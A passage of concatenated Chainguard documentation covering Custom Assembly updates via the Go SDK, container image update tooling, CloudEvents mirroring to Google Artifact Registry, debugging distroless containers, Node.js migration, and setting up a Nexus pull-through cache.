need for this tutorial’s sample application, run the following git command: git sparse-checkout set custom-assembly-go This modifies the sparse-checkout configuration initialized in the previous git clone command so that the checkout only consists of the repo’s custom-assembly-go directory. Navigate into this new directory: cd custom-assembly-go/ From here, you can run the application and use it to update the packages built into a Custom Assembly container. First though, let’s go through the main.go file where the executable application code is written In order to understand how it works. Understanding the Demo Application Before outlining how to run the demo application to update Custom Assembly container image, it’s important that you have a general understanding of how the application works. This section will only provide a general overview of the application. We encourage you to read through the complete application, as it includes comments that explain what each portion of the code does. Imports The demo application uses the following packages: import ( "context" "flag" "fmt" "log" "os" "strings" "time" . . . ) The application also uses the Chainguard SDK to interact with the Chainguard API and demonstrates proper patterns for authentication, error handling, and resource management. For this reason, the import section also brings in a number of protos from github.com/chainguard-dev/sdk, the GitHub repository that stores Chainguard’s public SDK for integrating with the Chainguard platform: import ( . . . "chainguard.dev/sdk/auth" "chainguard.dev/sdk/proto/platform" commonv1 "chainguard.dev/sdk/proto/platform/common/v1" "chainguard.dev/sdk/proto/platform/iam/v1" registryv1 "chainguard.dev/sdk/proto/platform/registry/v1" "gopkg.in/yaml.v2" ) Note that the imports block also contains gopkg.in/yaml.v2, the import path for the yaml package. This will allow the application to decode YAML values. Constants Immediately below the imports, the application creates a few constants used throughout the code: const ( defaultAPIURL = "https://console-api.enforce.dev" tokenEnvVariable = "TOK" defaultGroupName = "ORGANIZATION" demoRepoName = "CUSTOM-IMAGE-NAME" buildConfigFile = "build.yaml" ) defaultAPIURL: This points to the Chainguard API’s URL, which the application will reach in order to interact with the API. tokenEnvVariable: In order to use the Chainguard API, you must authenticate to prove that you have access to the resources you want to interact with. This constant defines an environment variable TOK that the application will expect to be present in order to function. This variable must hold a Chainguard authentication token; the next section describes how to create this environment variable. defaultGroupName: This constant points to the Chainguard organization whose Custom Assembly resources you would like to manage. demoRepoName: This constant points to the name of the Custom Assembly container image that you’d like to update with this demo application. buildConfigFile: This last constant points to the build.yaml file, which you’ll use to configure the Custom Assembly container image. Functions Following the list of constants, the application declares a series of functions: listRepositories: This function lists repositories in a group with optional name filtering. listBuildReports: Lists build reports for a repository. Build reports provide information about image builds, including status, timestamps, and digests of the resulting images. This function shows how to query build reports for a specific repository. printBuildReports: This helper function displays build reports in a user-friendly format, showing the start time, result status, and image digest for each report. applyCustomization: This function demonstrates the pattern for updating a repository with a custom overlay that defines the packages to include in the image. The overlay is applied to the repository, which triggers a new build. createClient: This function creates a new Chainguard API client using a token from the environment. confirmAction: This utility function handles user confirmation for potentially destructive actions. These functions come together in the main() function, which performs five main steps: Create a Chainguard API client and authenticate List repositories with optional filtering List existing build reports for the repository Apply image customizations using a build.yaml file List and monitor new build reports To accomplish all this, the application’s functions perform the following API calls: ListBuildReports ListRepos UpdateRepo Groups_List For a deeper understanding of what each function does and how the application works overall, we encourage you to closely review the main.go file before running it. You may also benefit from reviewing our OpenAPI Specification reference document. Once you feel you have a grasp on how the demo application works, move on to the next section which outlines how to run it. Running the Demo Application Before you can run the demo application, there are a few steps you need to take in order for it to work properly. First, run the following go commands: go mod init github.com/chainguard-dev/sdk && go mod tidy The go mod init command will initialize a new go.mod file in the current directory. Including the github.com/chainguard-dev/sdk URL tells Go to use that as the module path. The go mod tidy command ensures that the new go.mod file matches the source code in the module. As mentioned previously, you must authenticate before you can interact with the Chainguard API. For this reason, this demo application expects an environment variable named TOK to be present when it’s run. Create this environment variable with the following command: export TOK=$(chainctl auth token) Following that, open up main.go with your preferred text editor. This example uses nano: nano main.go From there, edit the following lines: // Group and repository settings defaultGroupName = "ORGANIZATION" demoRepoName = "CUSTOM-IMAGE-NAME" Replace ORGANIZATION with the name of your organization’s repository within the Chainguard registry. This usually takes the form of a domain name, such as example.com. Additionally, replace CUSTOM-IMAGE-NAME with the name of a Custom Assembly image. This is typically a name like custom-nginx or custom-python. Save and close the main.go file. If you used nano, you can do so by pressing CTRL+X, Y, and then ENTER. Next, open up the build.yaml file: nano build.yaml This file will have the following content: contents: packages: - wolfi-base - go Here, replace wolfi-base and go with whatever packages you’d like to be included in the customized container image. Note that you can only add packages that your organization already has access to, based on the Chainguard Containers you have already purchased. Refer to the Custom Assembly Overview for more details on the limitations of what packages you can add to a Custom Assembly image. Save and close the build.yaml file. Finally, you can run the application to apply the configuration listed in the build.yaml file to your organization’s Custom Assembly image: go run main.go The application will start by listing the information outlined previously, including the specified organization’s repositories and build reports for the chosen Custom Assembly image: Group: example.com (ID: 45a0cEXAMPLE977f050c5fb9aEXAMPLEed764595) All repositories in example.com: - custom-assembly - nginx - curl Repository: custom-assembly (ID: 45a0cEXAMPLE977f050c5fb9aEXAMPLEed764595/c375EXAMPLEb500c) Build Reports for custom-node repository: . . . It will then prompt you to confirm that you want to apply the customization configuration listed in the build.yaml file: About to apply customization using configuration file: build.yaml Are you sure you want to update repository custom-node? (y/n): y Enter y to confirm. Then, if everything was configured correctly, the application output will show successful build reports: . . . - Started: Mon, 28 Apr 2025 00:28:44 UTC, Result: Success, Digest: . . . Troubleshooting Although the demo application has been tested to ensure that it works properly, there are several pitfalls one may encounter when they attempt to run it. For example, you may run into an error like the following: Failed to list groups: rpc error: code = Internal desc = stream terminated by RST_STREAM with error code: PROTOCOL_ERROR This may indicate that there is an issue with your Chainguard authentication token. To resolve this, try recreating the environment variable that holds the token: export TOK=$(chainctl auth token) You may also encounter errors like the following: cannot find package "chainguard.dev/sdk/auth" . . . This may indicate that the Chainguard SDK wasn’t imported correctly. Be sure that you run the following commands to set this up: go mod init github.com/chainguard-dev/sdk && go mod tidy Again, the main.go file contains many comments that explain each portion of the code. If you encounter any errors, we encourage you to review the file closely to better understand how the application works and what might be going wrong. Learn More The example application highlighted in this guide is intended to show how you can manage Custom Assembly resources with the Chainguard API. To learn more about Custom Assembly, you can refer to the Custom Assembly Overview. Be aware that it’s also possible to edit a Custom Assembly container’s configuration using chainctl. Check out our documentation on the subject for more information. --- ### Strategies and Tooling for Updating Container Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/updating-images/strategies-tools-updating-images/ Last Modified: December 2, 2024 Tags: Chainguard Containers, Product When it comes to keeping a system secure, one of the most important measures you can take is to regularly apply updates. In modern, containerized infrastructures, this normally means updating containers to use only the latest container images that are still maintained. A casual observer might expect such a standard and important task to have agreed-on best practices and standardized tooling, but they might be surprised by the wide variety of different solutions and opinions on this problem. This conceptual article will delve into some of the options and offer guidance on which might work best for readers. This article assumes that you are familiar with semantic versioning (SemVer) and image tagging. If you aren’t acquainted with these concepts, please check out this guide on Considerations for Keeping Containers Up to Date. Updating Means Risk The core issue with applying updates is that it’s a fundamentally risky endeavor; any update to software risks a change to behavior and system breakages. It’s a common practice to avoid major updates for weeks or even months in order to ensure bugs have been worked out before upgrading. Larger software projects (like PostgreSQL, Java, and Node.js) often have multiple versions of their project in support at the same time. This means that users can stay on an older version and avoid the more risky updates while still getting security patches. Although this approach is helpful to operations teams, it is only practical on large projects with paid maintainers that can spend time backporting fixes. Smaller projects will often struggle with just keeping the main version up to date. Not Updating Means More Risk End of Life (EOL) software presents a host of security risks. Upgrading may require a great deal of work and proper testing, but it’s a small price to pay to keep your systems from being at risk and accruing technical debt. If your application has an automated test suite with good coverage, you can be confident that any breakages caused by upgrades will be caught before deployment to production. Of course, whenever a test failure occurs, there will be work required to address it. Putting off that work by delaying upgrades will only mean that more work is required in the future as further changes pile up. Another way organizations test and reduce the risk of breaking changes introduced by updates is through the use of staging environments where changes are tried out before being pushed to production. An alternative approach to this is testing in production, which usually involves using techniques like feature flags and staged updates to verify the effects of changes before they impact the majority of users. Knowing When Updates are Available The primary way of knowing when a new image is available is through the registry itself. Many registries will offer a webhook callback service (Docker Hub, for example), but this is typically only for your own repositories. If you want to get notified when a public repository is updated, you’ll generally have to use a third-party service like NewReleases. If you’re trying to find out how outdated the images in your Kubernetes cluster are, you might find the version-checker project to be useful. This is a Kubernetes utility that will create an inventory of your current images and produce a chart showing how out of date they are. The dashboard can form part of a full solution with notifications for outdated software being sent to cluster administrators for mitigation. Updating Solutions This section outlines some commonly employed solutions for keeping images up to date. We’ll only consider solutions that involve automation — you could argue that kubectl set image is an updating solution, but it would only be scalable as part of an automated pipeline. Using latest or major version tags One common strategy is to only use the latest tag or major version tags. This means having something like the following in your Dockerfile: FROMcgr.dev/chainguard/redis:3Or, if you’re using a Kubernetes manifest, you might have a line like this: image: cgr.dev/chainguard/redis:latest The tag used will determine the jump in the updated version; latest will jump major versions so typically a major or minor tag is chosen to limit the size of changes. The goal for this strategy is to update the image whenever it is rebuilt or redeployed. However, the reality is that this approach is still dependent on caching and configuration (especially the image pull policy) and it may involve a considerable time to redeployment. One major issue with this approach is that you lack control and reproducibility over the images that will be deployed. In Kubernetes you can end up with different pods in the same deployment running different versions of the application because nodes pulled the image at slightly different times. Debugging can become difficult, as you can’t easily recreate the system. You can’t even say for sure what is running in the cluster, which will be a big problem when you need to respond to a security situation. The advantage of this approach is that it is relatively simple, requires little maintenance, and will keep up to date with changes over time, meaning it’s often appropriate for simple projects, or example code. However, it’s recommended that you don’t deploy the latest tag to production, as doing so can present its own risks. Keel Keel is a Kubernetes Operator that will automatically update Kubernetes manifests and Helm charts. It has multiple options for finding updates — typically using webhooks from registries and falling back to polling for new versions. Updates are controlled through policies which cover the normal cases. GitOps: Flux and ArgoCD GitOps is a set of practices that leverage Git as a single source of truth for infrastructure automation. The two leading GitOps solutions for updating images are Flux and ArgoCD (though there are also newer solutions gaining traction including fleet and kluctl). Flux Flux uses an ImageRepository custom resource that polls repositories for updates. There is also support for webhooks via the Notification Controller. An ImagePolicy custom resource defines what tags we’re interested in — typically you will use a SemVer policy, such as range: 5.0.x, to get minor updates. An ImageUpdateAutomation resource then defines how to handle updates, such as by checking an update commit directly or committing to a new branch and opening a GitHub pull request for manual approval. There is also support for reverting updates and suspending automation to support incident response. ArgoCD ArgoCD has a separate Image Updater project that can be used to automate updates. Rather than creating new resources, ArgoCD relies on annotations being added to existing manifests. Update strategies are similar to Flux, with support for SemVer and regular expressions to filter tags. Unlike Flux, there is currently no support for webhooks, but this could change in the future. ImageStreams OpenShift has the concept of ImageStreams for handling updates. ImageStreams are a “virtual view” on top of images. Deployments and builds can listen for ImageStream notifications to automatically update for new versions. The underlying data for an ImageStream comes from registries, but decoupling this data means it is possible to have different versions in the ImageStream and on the registry. This in turn allows for processes such as rolling back a deployment without retagging images on the registry. The ImageStream itself is represented as a custom resource which contains a history of previous digests, ensuring that rollbacks are possible even when tags are overwritten (assuming the image isn’t deleted). Frizbee and digestabot A best practice in supply chain security is to specify GitHub actions and container images by their digest. The digest is a content-based SHA of the image that is guaranteed to always refer to exactly the same version of the action or code, and it is also guaranteed to not have changed. In other words, digests are immutable, meaning that they can’t be changed to point to something else. The disadvantages are that digests aren’t human-readable and you need to keep updating them to stay up to date. However, It is possible to get something human-readable as well as immutable. The following are valid image references which specify both a meaningful tag and an immutable digest: cgr.dev/chainguard/wolfi-base:latest@sha256:3eff851ab805966c768d2a8107545a96218426cee1e5cc805865505edbe6ce92 redis:7@sha256:01afb31d6d633451d84475ff3eb95f8c48bf0ee59ec9c948b161adb4da882053 Frizbee, a tool from Stacklok, will update image references to the most up-to-date digest. For the above example, it will ask the registry for the digest of the cgr.dev/chainguard/wolfi-base:latest image and update it if it doesn’t match. At Chainguard, we take a similar approach with the digestabot tool. Digestabot is a GitHub action that will look up digests in the above format and open a PR to update them. Dependabot Dependabot is GitHub’s tool for monitoring dependencies. It can be used with GitHub, but can also be self-hosted. Dependabot is designed to work with a variety of different package ecosystems, as well as container images referenced in Dockerfiles and Kubernetes manifests. Dependabot runs on a schedule and will open pull requests to update dependencies when it finds outdated versions. Renovate Renovate is a similar solution to Dependabot and will open PRs to update out-of-date dependencies. The major difference is that Renovate is a self-hosted application that supports multiple repositories, like GitLab, Azure, and Bitbucket, instead of just GitHub. Conclusion Something as important as keeping packages up to date has more approaches and tooling than one might expect. This article has shied away from offering any clear recommendations, but this is a matter where every organization will need to choose a solution that suits its own needs. We encourage you to check out each of the solutions listed in this article and judge them on their own merits. We also suggest you read our other articles on handling EOL software, including Considerations for Keeping Containers Up to Date. --- ### Mirror new Containers to Google Artifact Registry with Chainguard CloudEvents URL: https://edu.chainguard.dev/chainguard/administration/cloudevents/image-copy-gcr/ Last Modified: March 7, 2025 Tags: Product, CloudEvents, Procedural Certain interactions with Chainguard resources will emit CloudEvents that you or an application can subscribe to. This allows you to do things like receive alerts when a user downloads one or more of your organization’s private container images or when a new image gets added to your organization’s registry. This tutorial is meant to serve as a companion to the Image Copy GCP example application. It will guide you through setting up infrastructure to listen for push events on an organization’s private registry and mirror any new Chainguard Containers in the registry to a repository in a GCP Artifact Registry repository. Prerequisites To follow along with this guide, it is assumed that you have the following set up and ready to use. A verified Chainguard organization with a private Registry and access to Production Containers. chainctl, the Chainguard command-line interface. You can install this by following our guide on How to Install chainctl. terraform to configure a Google Cloud service account, IAM permissions, and deploy the Cloud Run service. A Google Cloud account with a project running. The example application assumes that your project has the following APIs enabled: Artifact Registry API Cloud Run Admin API The gcloud CLI installed on your local machine. You’ll need this to authenticate to Google Cloud over the command line. Setting up the Terraform configuration You can find all the code associated with this sample application in our Platform Examples repository on GitHub. To set up the sample application, you can create a Terraform configuration file and apply it to set up the necessary resources. To begin, create a new directory to hold the configuration and navigate into it. mkdir ~/gcp-example && cd $_ From within the gcp-example directory, you can begin creating a Terraform configuration named main.tf. This configuration will consist of a single module. For the purposes of this example, we will call it image-copy. This module’s source value will be the iac folder from the application code in the examples repository. module "image-copy" { source = "github.com/chainguard-dev/platform-examples/image-copy-gcp/iac" The next five lines configure a few variables that you will need to update to reflect your own setup. First, the configuration defines a name value. This will be used to prefix resources created by this sample application where possible. Next, it specifies the GCP project ID where certain resources will reside, including the container image for this application (along with mirrored images), the Cloud Run service hosting the application, and the Service Account that authorizes pushes to the Google Artifact Registry. Following that, the configuration specifies the Chainguard IAM organization from which we expect to receive events. This is used to authenticate that the Chainguard events are intended for you, and not another user. Container images pushed to repositories under this organization will be mirrored to Artifact Registry. You can find the names of every organization you have access to by running chainctl iam organizations list -o table. The next line specifies the location of the Artifact Registry repository and the Cloud Run subscriber. The final line defines dst_repo value, which is used to create a name for the repository in the Artifact Registry where container images will be mirrored. As an example, if the name value you specify is chainguard-dev and the dst_repo value is mirrored (as shown in the following example) any pushes to cgr.dev/<organization>/foo will be mirrored to <location>-docker.pkg.dev/<project_id>/chainguard-dev-mirrored Be sure to include a closing curly bracket after the final line. name = "chainguard-dev" project_id = "<project-id>" group_name = "<organization-name>" location = "us-central1" dst_repo = "mirrored" } You can create this file with a command like the following. cat > main.tf <<EOF module "image-copy" { source = "github.com/chainguard-dev/platform-examples/image-copy-gcp/iac" name = "chainguard-dev" project_id = "<project-id>" group_name = "<organization-name>" location = "us-central1" dst_repo = "mirrored" } EOF Make sure to replace the placeholders with your own settings for project_id and group. In the next section, we’ll see how to apply the configuration to get the application up and running. Applying the configuration The Terraform configuration you created in the previous section will do all the work of setting up an events subscription for you. Specifically, it will build the mirroring application into a container image using ko_build and deploy the app to a Cloud Run service with permission to push to the Google Artifact Registry. It also sets up a Chainguard Identity with permissions to pull from the private cgr.dev repository, allows the Cloud Run service’s service account to assume the puller identity, and sets up a subscription to notify the Cloud Run service when pushes happen to cgr.dev. Before applying the configuration, you’ll need to log in to both the Chainguard platform with chainctl and GCP with gcloud. chainctl auth login gcloud auth login If you haven’t already done so, you will also need to acquire new access credentials to use as Application Default Credentials. You can do so with this command. gcloud auth application-default login Following that, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the file you set up in the last section. terraform plan If the plan worked successfully and you’re satisfied that it will produce the resources you expect, you can apply it. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. . . . Plan: 8 to add, 0 to change, 0 to destroy. Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: yes . . . Apply complete! Resources: 8 added, 0 changed, 0 destroyed. Assuming all the resources were created as expected, you can observe the application in action. Testing the application If the terraform apply command you ran in the previous section was successful, the Terraform configuration will have set up a Cloud Run service to host the example application. As mentioned previously, this application listens for registry.push events that occur on your organization’s repository; any time a new Container gets added to your organization’s Registry the application will mirror it to your GCP project’s Artifact Registry and into a repository named with the name and dst_repo values you set in your main.tf file. For example, if these values were chainguard-dev and mirrored, respectively, (as shown in the previous example) the mirror repository would be found at <location>-docker.pkg.dev/<project_id>/chainguard-dev-mirrored. You can find the results of the application in your GCP Project’s dashboard. Navigate to your GCP Project’s Artifact Registry, then click on the mirror repository you set up with Terraform. There, you will find any Chainguard Containers that have been added to your organization’s Registry since you deployed the application. This example shows a repository named chainguard-dev-mirrored with two images (node and python) mirrored into it. Be aware that just because the application is listening for registry.push events doesn’t mean any will occur automatically. Chainguard Containers are generally updated at least once every twenty four hours, so container images may not immediately appear in your mirror repository. Removing sample resources If you’d like to remove the resources you created with Terraform, you can run the terraform destroy command. terraform destroy This will destroy everything created in your Terraform configuration, including the Artifact Registry repository, the Service Account, and the Cloud Run service. You can then remove the working directory to clean up your system. rm -r ~/gcp-example/ Following that, all of the example resources created in this guide will be removed from your system. Learn more Chainguard emits more CloudEvents than just the registry:push events highlighted in this guide. We encourage you to check out our overview of Chainguard Events to learn the full breadth of event types that Chainguard generates. In addition, you may find it useful to explore the rest of our Administration resources to better understand how you can work with Chainguard’s products. --- ### Debugging Distroless Container Images with Kubectl Debug and CDebug URL: https://edu.chainguard.dev/chainguard/chainguard-images/troubleshooting/kubectl_cdebug/ Last Modified: May 22, 2024 Tags: Chainguard Containers, Product Tools used in this video kubectl cdebug Transcript So a while back I did a video on using Docker Debug to debug distroless containers. Docker Debug is fantastic, but you do need a Docker Desktop Pro license to take advantage of it. So I want to show a couple of other alternatives. First up we’re going to look at kubectl debug. So to the terminal. Okay, so the main reason tooling becomes important when debugging distroless containers is because there’s no shell in a distroless container. So you can’t just exec in to see what’s going on like you would with a debian or alpine container. And that means we need the tooling to do some extra work to make this possible. And normally that means creating a temporary container that shares the file and process namespaces with the target container. So let’s see how this looks with kubectl debug. So I have a kind cluster running locally. There’s no pods currently. But I have this nginx YAML which will start a cgr.dev/chainguard/nginx image. The container is called nginx but the pod is called nginx-pod. Okay so let’s try and get that running. Looks good. Okay now say we want to debug this pod. Maybe it’s throwing an error or displaying the wrong text etc. So if it was a regular container you’d expect to do something like this. But because it’s distroless we get /bin/sh no such file directory. And that’s where kubectl debug comes in. So I can run a command like this. And what we’re saying is kubectl debug -it for interactive terminal. Then we give it the image. The image is the debug container image. So typically you want something with a shell and you’re able to install more debugging tools. So in this case we said alpine. We’ve then given it the name of the pod so the nginx-pod but also the container we’re interested in. So this one’s caught me out a few times. You do want to pass --target and the name of the container you need so that you get access to the target container namespace or process namespace. Okay so I run that. Okay I’ve got a shell and if I run ps I see the nginx processes. So that’s excellent and it looks like it’s all worked. Unfortunately it’s not as easy as that. So if I do ls I see a container file system but this isn’t the file system for my target container. It’s the file system for the debug container. Yep so we’re in an alpine container at the minute. And say I want to debug this /etc/nginx/nginx.conf file. Well that’s not in this container it’s in the target container. Now I can or should be able to get to that namespace via the proc file system. I get permission denied which you might think is odd because I am root but this is to do with namespaces and permissions and things not being quite as they seem in containers. So I can’t actually access the container file system in this case. And there’s actually a second problem as well. If I was to run this pod again and we’re going to call it pod 2 and this time we’ve got security context that says you can’t run continuous as root. Now you can probably guess what the problem is going to be here. So I’ll start with the second pod and if we try to do this the exact same command as did before well it’s going to pause for a while and then eventually it should give me a warning but it never actually connects to the container because of this rule of not running as root which of course the alpine container wants to run as root by default. Okay so there’s a second issue there and they’re both kind of related issues. What you really want to do in this case is run your containers not as the root user but as different user – as the Chainguard nginx image runs. So the Chainguard nginx defines a non-root user that’s running that and that’s you know security best practice. And what we want is we want our debug container to also run as the same user. So how can we do that? So in this case we’ve used alpine image but we can change to use a different image. So I could also create a dockerfile and with a USER statement it changes the user. Unfortunately there’s no --user command to pass to kubectl debug which would be really useful but what I can do is use not the nginx latest image but the latest-dev image. The latest-dev image includes a shell and package manager so I can use this as a as a good debugging image. I’m also sure it’s gonna have the same user because it’s just a variant of the nginx image. Okay so hopefully this will work. Yes so now I am in the container. I run ps. Yes I see the nginx processes. Now again I still need to figure out where the file system is. Oh of course I’ve got my development image so this file exists but I’m still in the debug container I’m not in the proper container namespace but I can get there. There you go. So that’s the actual nginx.conf from my target container. Okay so to fix both of those problems with kubectl debug what we did was we started a container that runs as the same user. So yeah top tip there and the other top tip is remember this target command. That’s the two things that trip me up with kubectl debug. kubectl debug does have a couple more powerful things that I’m not going to go through now but I do want to mention what I thought was particularly useful is it has a --copy command so you can create a copy of a container and modify that to see what’s going on with how affecting your production image. So that’s quite cool. The other tool I want to show you is cdebug by Ivan Velichko and I also want to say thanks to Ivan as it was a conversation with him that inspired this video and helped me understand the user problems with kubectl debug. So we still have our kubectl pods running and we’re going to try accessing them with cdebug. Here we’re saying exec -it so interactive terminal as per usual but we’ve added this --privileged flag that cdebug accepts and we’re targeting the Kubernetes pod nginx pod and the container nginx inside. Okay and that’s worked straight away so that’s great. We can see the processes as before but we can also access the file system and if we take a look to leave out the slash and we can even edit files in the file system because we’re privileged in this case. Let’s put blank space in so we don’t break anything. Okay so that’s even better we can see the file system we can see the processes and can even change files and play with things. But what happens if we try it with our other pod? So we’ve got this nginx-pod2. Well it does kind of work but because we can’t run as root it changes to the user 1000 which makes sense. But I don’t want to do that in this case what we’re going to do is pass --user so cdebug does take a --user flag and in this case we can use it to set our user to the same user as the container. Okay so that’s worked and we haven’t got any warnings about user. Type ps I can still see my processes. Now what happens if I access the file system this time? Looks like I can’t see it but if I open the file, no I put a slash in my mistake. So I can look at the file but in this case I can’t edit it. But still a pretty good result all I had to do is pass the --user flag. Okay so that was both cdebug and kubectl debug which are both great utilities for debugging distroless containers. Please do try them out and let me know how you get on. Thank you. --- ### How to Migrate a Node.js Application to Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-guides/node-images/ Last Modified: April 25, 2024 Tools used in this video Docker Resources Tutorial on Porting a Sample Application Example Application Git repository with code used in demo Transcript Today, we’re going to look at how easy it is to port a Dockerfile for a Node.js application to use a Chainguard Container base and how it can help improve the image, especially in terms of security. I’ll be using the free tier of Chainguard Containers here, so you can do everything in this video yourself today. OK, over to the terminal. So I have a directory here with a simple Node.js application. I think the first thing we should do is just see it running so you understand what it does. OK, so it’s running on port 8080. If I do a curl, what we’re going to do is curl port 8080. We’re going to hit the monster endpoint and give it some input and a size. And what you’ll see is we get an image back. So basically, it produces like an identicon, if you know what an identicon is, or a unique avatar for its input. So if I give it an input, so I’ll give my manager Lisa’s name here, and you get the appropriate avatar out. So we can put in anything we like here. And if you put the same thing in again, you should get the same thing back out. And it’s sometimes used as a default image for users on a website, such as GitHub. OK, so let’s take a look at the Dockerfile for this application. You can see that it uses the Node official image from Docker Hub. It installs quite a few dependencies that are needed for the graphics capability, creates a non-root user, copies over the package JSON, and installs some Node modules. Then it copies over the code, changes to the dnmonster user, and calls npm start. So that all makes sense. Let’s have a go at building it. And that was all cached, so that was really fast. But let’s have a look at what it’s built. So that image is 1.22 gigabytes in size. So it’s a pretty large image. If we run it through Docker Scout, to look at the CVEs. I tend to use Docker Scout. It has quite nice summary output. But you can, of course, use Grype or whatever, et cetera. And what it’s telling me is this image has two high, seven medium, and 109 low CVEs. It is saying that I can change to the slim image, and I will reduce that to three medium and 24 low vulnerabilities. But we’re not going to do either of that. We’re going to change to use a Chainguard Container and see how that affects things. So I’m going to use the Chainguard registry here at cgr.dev. And we’re going to use the latest-dev image. So there’s a couple of things here. I’m using a Chainguard registry. I could also use the Docker Hub. So Chainguard Containers are available on the Docker Hub, just in the Chainguard user or namespace. But in this case, we’re using the Chainguard registry. For free, we provide the latest and latest-dev images. The difference between the latest and latest-dev is latest-dev includes a package manager and a shell, which I’m going to need in this case to install some dependencies. Now, these dependencies are all apt-get based. And Chainguard Containers, we have APK tools. We’re not an Alpine distribution, we use our own Linux distribution called Wolfi. But we do also use the APK tools. So first thing I’m going to do is switch this line to be the equivalent in Wolfi. So first thing you do is change to the root user so I can install software. So the Chainguard Containers typically do not run as root by default. And then I’m going to use APK add to install our software. And you can see the fairly similar package names to the app packages. We’ve got Cairo here. We’ve got Cairo there, for example, and libjpeg, et cetera, et cetera. But they are slightly different names. OK. Then what do I need to do? So the next part is the groupadd. So again, that’s typically different in Wolfi images as we generally use the BusyBox tools. So that’s not groupadd. It’s addgroup. So this line is going to change to look like that. install can remain the same. We do have another difference down the bottom, though. This npm start. So because Chainguard Containers by default don’t have a shell, this doesn’t work. Basically, this will get passed to the node binary to be interpreted, which isn’t what we want. So what I’m going to do is change this to be an entrypoint command. And then I know it’s not going to be passed as an argument to the node binary. And that should work. Let’s try building it. This time we’ll call it dnmonster-cg. Again, it was cached, so that was pretty fast. If I can spell. And now this time it’s 880 megabytes. So that’s, what, 340 megabytes saving, which is pretty good. But more interestingly, what’s happened to the CVEs? Yeah, there’s no CVEs in this image. So that’s a very big jump and great to see. I would say 880 megabytes is still quite a large image. So let’s see if we can get it down a bit further. And what we can do is we can change to use a multi-stage build. So here everything is getting installed in this node latest-dev image. And we even have things like a C compiler in this image, which we don’t really want in our final production image. So what we’re going to do is we’re going to change to use a multi-stage build. First thing I’m going to do is call this the build stage. And then we’re going to have a second stage where we copy the assets out of this image and into the production image. And I’m just going to copy one I made before. So here we’re using wolfi-base. I can’t use the Node latest image because we need to install these dependencies. So for that reason, I’ve used wolfi-base. So this image will end up with a package manager and a shell in it. But it’s still a lot smaller than the latest-dev image because we don’t have things like a C compiler and other build tooling in there. Note that I did have to add nodejs to this list to explicitly install Node.js. But otherwise, we’re just copying over the build assets from the previous stage and setting the entrypoint. We no longer have NPM, so I’ve explicitly set it to call Node with server.js. OK, so let’s try building this one. We call it multi, if I can spell. OK, again, that was cached, so that’s been fast. Right, now we’re down to 334 megabytes, so a much better size. And just for the sake of checking, we should also run it through Docker Scout. I hope we’ve not somehow managed to add in vulnerabilities. We shouldn’t have. Yeah, there’s no vulnerability, so that’s great. But there is still a problem with this image. So let’s try running it. It should still work. So there’s Lisa’s avatar again. But if I try and stop this, so docker stop 12386, it hangs. And that’s not great. And the reason it’s hanging is because the Node binary doesn’t handle signals properly, or isn’t set up to handle signals properly. And basically, the Docker sends a SIGTERM to the container. It doesn’t respond to the SIGTERM, so a few seconds later, it sends a SIGKILL. And that’s not really what you want for a clean shutdown. So what we’re going to do is we’re going to add a tool called tini, which is basically an init system to this image. And we’re going to add that to the entrypoint as well. So now the PID 1 in this container isn’t going to be Node, it’s going to be tini. And tini will take care of handling signals and also reaping children and things like that. OK, so if we run this again. We need to build it first. And if we run it again, should still work. Yes. But this time, if I do docker stop 1ad2, it stops immediately because tini has correctly handled the signals. OK, so that’s pretty much all I have. We’ve seen how moving a Node application to Chainguard Containers can significantly reduce the size of the image and completely cut the CVE count in the image. Please do give this a try and let me know how you get on. --- ### How to Set Up Pull Through from Chainguard's Registry to Nexus URL: https://edu.chainguard.dev/chainguard/chainguard-registry/pull-through-guides/nexus-pull-through/ Last Modified: August 19, 2024 Tags: Product, Chainguard Containers Organizations can use Chainguard Containers along with third-party software repositories in order to integrate with current workflows as the single source of truth for software artifacts. In this situation, you can set up a proxy repository to function as a mirror of Chainguard’s registry. This mirror can then serve as a pull through cache for your Chainguard Containers. This tutorial outlines how to set up a repository with Sonatype Nexus. Specifically, it will walk you through how to set up one repository you can use as a pull through cache for Chainguard’s public Starter containers or for Production containers originating from a private Chainguard repository. Prerequisites In order to complete this tutorial, you will need the following: Administrative privileges over a Nexus instance. If you’re interested in testing out this configuration, you can either download a trial from Sonatype’s website or run it as a Docker container. Note: If you use the Docker solution, you will need to add an extra port for the repository to the docker run command. For example, if you run the repository on port 5051, you would a command like docker run -d -p 8081:8081 -p 5051:5051 --name nexus sonatype/nexus3 instead of the example given in the linked GitHub overview. Privileges to create a pull token on a Chainguard registry. (For private Chainguard repository access) A spare port on the Nexus server to serve the repository (Nexus limits you to 20 ports). Or an alternative solution — such as a reverse proxy — which is beyond the scope of this guide. Setting up Nexus as a pull through for Starter containers Starter container images are free to use, publicly available, and always represent versions tagged as :latest. To set up a remote repository in Nexus from which you can pull Starter containers, log in to Nexus with an admin account. Once there, click on the Administration mode cog in the top bar, click Repository in the left-hand navigation menu, and then select Repositories. On the Repositories page, click the Create Repository button and select the docker (proxy) Recipe. Following that, you can enter the following details for your new remote repository: Name — This is used to refer to your repository. You can choose whatever name you like here, but this guide’s examples will use the name chainguard. Remote storage — This must be set to https://cgr.dev/. HTTP[S] port — Choose an HTTP or HTTPS port as appropriate for your setup. Following that, click the Create repository button at the bottom of the page. If everything worked as expected, you’ll be taken back to the repository list and should now see an extra repository with your chosen name, with type “proxy”. Your Nexus URL is the hostname of the Nexus server AND the port number you chose; for example, myrepo.local:5051. If your Nexus server is running from a Docker container, your Nexus URL would be something like localhost:5051. Testing pull through of a Starter container If your setup requires authentication, log in with a valid Nexus username and password: docker login -u<user> <Nexus URL> After running this command, you’ll be prompted to enter a password. After running the docker login command, you will be able to pull a Starter container image through Nexus. The following example pulls the wolfi-base container image: docker pull <Nexus URL>/chainguard/wolfi-base Be sure the docker pull command contains the correct Nexus URL for your repository. Setting up Nexus as a pull through for Production containers Production Chainguard Containers are enterprise-ready images that come with patch SLAs and features such as Federal Information Processing Standard (FIPS) readiness. The process for setting up an Nexus repository that you can use as a pull through cache for Production images is similar to the one outlined previously for Starter containers, but with a few extra steps. To get started, you will need to create a pull token for your organization’s registry. Pull tokens are longer-lived 